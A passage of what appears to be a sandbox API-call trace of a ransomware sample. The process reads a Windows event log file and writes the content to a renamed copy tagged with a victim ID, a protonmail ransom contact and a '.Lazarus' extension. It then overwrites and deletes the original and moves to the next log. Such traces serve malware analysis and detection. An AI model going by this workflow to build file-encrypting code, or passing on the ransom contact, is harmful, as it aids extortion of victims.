[0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0085.622] GetLastError () returned 0x0 [0085.622] SetLastError (dwErrCode=0x0) [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68ea0 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.623] AreFileApisANSI () returned 1 [0085.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0085.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x55f20 [0085.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=98 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0085.623] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\key management service.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.623] GetFileType (hFile=0x424) returned 0x1 [0085.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0085.623] AreFileApisANSI () returned 1 [0085.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68e00 [0085.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68e00, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.624] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.624] GetFileType (hFile=0x348) returned 0x1 [0085.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.624] GetLastError () returned 0x0 [0085.624] SetLastError (dwErrCode=0x0) [0085.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.624] GetLastError () returned 0x0 [0085.624] SetLastError (dwErrCode=0x0) [0085.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.624] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0085.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0085.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0085.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0085.633] GetLastError () returned 0x0 [0085.633] SetLastError (dwErrCode=0x0) [0085.633] GetLastError () returned 0x0 [0085.633] SetLastError (dwErrCode=0x0) [0085.633] GetLastError () returned 0x0 [0085.633] SetLastError (dwErrCode=0x0) [0085.633] GetLastError () returned 0x0 [0085.633] SetLastError (dwErrCode=0x0) [0085.633] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.742] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.743] GetLastError () returned 0x0 [0085.743] SetLastError (dwErrCode=0x0) [0085.743] GetLastError () returned 0x0 [0085.743] SetLastError (dwErrCode=0x0) [0085.743] GetLastError () returned 0x0 [0085.743] SetLastError (dwErrCode=0x0) [0085.743] GetLastError () returned 0x0 [0085.743] SetLastError (dwErrCode=0x0) [0085.743] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.743] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.744] GetLastError () returned 0x0 [0085.744] SetLastError (dwErrCode=0x0) [0085.744] GetLastError () returned 0x0 [0085.744] SetLastError (dwErrCode=0x0) [0085.744] GetLastError () returned 0x0 [0085.744] SetLastError (dwErrCode=0x0) [0085.744] GetLastError () returned 0x0 [0085.744] SetLastError (dwErrCode=0x0) [0085.744] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.745] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.745] GetLastError () returned 0x0 [0085.745] SetLastError (dwErrCode=0x0) [0085.745] GetLastError () returned 0x0 [0085.745] SetLastError (dwErrCode=0x0) [0085.745] GetLastError () returned 0x0 [0085.745] SetLastError (dwErrCode=0x0) [0085.745] GetLastError () returned 0x0 [0085.745] SetLastError (dwErrCode=0x0) [0085.745] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.745] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.746] GetLastError () returned 0x0 [0085.746] SetLastError (dwErrCode=0x0) [0085.746] GetLastError () returned 0x0 [0085.746] SetLastError (dwErrCode=0x0) [0085.746] GetLastError () returned 0x0 [0085.746] SetLastError (dwErrCode=0x0) [0085.746] GetLastError () returned 0x0 [0085.746] SetLastError (dwErrCode=0x0) [0085.746] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.746] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.747] GetLastError () returned 0x0 [0085.747] SetLastError (dwErrCode=0x0) [0085.747] GetLastError () returned 0x0 [0085.747] SetLastError (dwErrCode=0x0) [0085.747] GetLastError () returned 0x0 [0085.747] SetLastError (dwErrCode=0x0) [0085.747] GetLastError () returned 0x0 [0085.747] SetLastError (dwErrCode=0x0) [0085.747] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.747] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.747] GetLastError () returned 0x0 [0085.747] SetLastError (dwErrCode=0x0) [0085.748] GetLastError () returned 0x0 [0085.748] SetLastError (dwErrCode=0x0) [0085.748] GetLastError () returned 0x0 [0085.748] SetLastError (dwErrCode=0x0) [0085.748] GetLastError () returned 0x0 [0085.748] SetLastError (dwErrCode=0x0) [0085.748] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.748] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.748] GetLastError () returned 0x0 [0085.748] SetLastError (dwErrCode=0x0) [0085.748] GetLastError () returned 0x0 [0085.748] SetLastError (dwErrCode=0x0) [0085.749] GetLastError () returned 0x0 [0085.749] SetLastError (dwErrCode=0x0) [0085.749] GetLastError () returned 0x0 [0085.749] SetLastError (dwErrCode=0x0) [0085.749] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.749] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.749] GetLastError () returned 0x0 [0085.749] SetLastError (dwErrCode=0x0) [0085.749] GetLastError () returned 0x0 [0085.749] SetLastError (dwErrCode=0x0) [0085.749] GetLastError () returned 0x0 [0085.749] SetLastError (dwErrCode=0x0) [0085.750] GetLastError () returned 0x0 [0085.750] SetLastError (dwErrCode=0x0) [0085.750] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.750] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.750] GetLastError () returned 0x0 [0085.750] SetLastError (dwErrCode=0x0) [0085.750] GetLastError () returned 0x0 [0085.750] SetLastError (dwErrCode=0x0) [0085.750] GetLastError () returned 0x0 [0085.750] SetLastError (dwErrCode=0x0) [0085.750] GetLastError () returned 0x0 [0085.750] SetLastError (dwErrCode=0x0) [0085.751] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.751] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.751] GetLastError () returned 0x0 [0085.751] SetLastError (dwErrCode=0x0) [0085.751] GetLastError () returned 0x0 [0085.751] SetLastError (dwErrCode=0x0) [0085.751] GetLastError () returned 0x0 [0085.751] SetLastError (dwErrCode=0x0) [0085.751] GetLastError () returned 0x0 [0085.751] SetLastError (dwErrCode=0x0) [0085.751] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.752] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.752] GetLastError () returned 0x0 [0085.752] SetLastError (dwErrCode=0x0) [0085.752] GetLastError () returned 0x0 [0085.752] SetLastError (dwErrCode=0x0) [0085.752] GetLastError () returned 0x0 [0085.752] SetLastError (dwErrCode=0x0) [0085.752] GetLastError () returned 0x0 [0085.752] SetLastError (dwErrCode=0x0) [0085.752] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.752] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.753] GetLastError () returned 0x0 [0085.753] SetLastError (dwErrCode=0x0) [0085.753] GetLastError () returned 0x0 [0085.753] SetLastError (dwErrCode=0x0) [0085.753] GetLastError () returned 0x0 [0085.753] SetLastError (dwErrCode=0x0) [0085.753] GetLastError () returned 0x0 [0085.753] SetLastError (dwErrCode=0x0) [0085.753] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.753] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.753] GetLastError () returned 0x0 [0085.753] SetLastError (dwErrCode=0x0) [0085.754] GetLastError () returned 0x0 [0085.754] SetLastError (dwErrCode=0x0) [0085.754] GetLastError () returned 0x0 [0085.754] SetLastError (dwErrCode=0x0) [0085.754] GetLastError () returned 0x0 [0085.754] SetLastError (dwErrCode=0x0) [0085.754] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.754] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.754] GetLastError () returned 0x0 [0085.754] SetLastError (dwErrCode=0x0) [0085.755] GetLastError () returned 0x0 [0085.755] SetLastError (dwErrCode=0x0) [0085.755] GetLastError () returned 0x0 [0085.755] SetLastError (dwErrCode=0x0) [0085.755] GetLastError () returned 0x0 [0085.755] SetLastError (dwErrCode=0x0) [0085.755] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.755] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.755] GetLastError () returned 0x0 [0085.755] SetLastError (dwErrCode=0x0) [0085.757] GetLastError () returned 0x0 [0085.757] SetLastError (dwErrCode=0x0) [0085.757] GetLastError () returned 0x0 [0085.757] SetLastError (dwErrCode=0x0) [0085.757] GetLastError () returned 0x0 [0085.757] SetLastError (dwErrCode=0x0) [0085.757] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.758] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.758] GetLastError () returned 0x0 [0085.758] SetLastError (dwErrCode=0x0) [0085.758] GetLastError () returned 0x0 [0085.758] SetLastError (dwErrCode=0x0) [0085.758] GetLastError () returned 0x0 [0085.758] SetLastError (dwErrCode=0x0) [0085.758] GetLastError () returned 0x0 [0085.758] SetLastError (dwErrCode=0x0) [0085.758] ReadFile (in: hFile=0x348, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0085.759] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0085.759] GetLastError () returned 0x0 [0085.759] SetLastError (dwErrCode=0x0) [0085.759] GetLastError () returned 0x0 [0085.759] SetLastError (dwErrCode=0x0) [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0085.759] CloseHandle (hObject=0x424) returned 1 [0085.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.761] CloseHandle (hObject=0x348) returned 1 [0085.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.761] AreFileApisANSI () returned 1 [0085.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0085.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.761] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.763] GetFileType (hFile=0x348) returned 0x1 [0085.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0085.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.763] GetLastError () returned 0xb7 [0085.763] SetLastError (dwErrCode=0xb7) [0085.763] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0085.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.764] CloseHandle (hObject=0x348) returned 1 [0085.764] AreFileApisANSI () returned 1 [0085.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68e00 [0085.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68e00, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.764] DeleteFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0085.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0085.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.766] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0085.766] 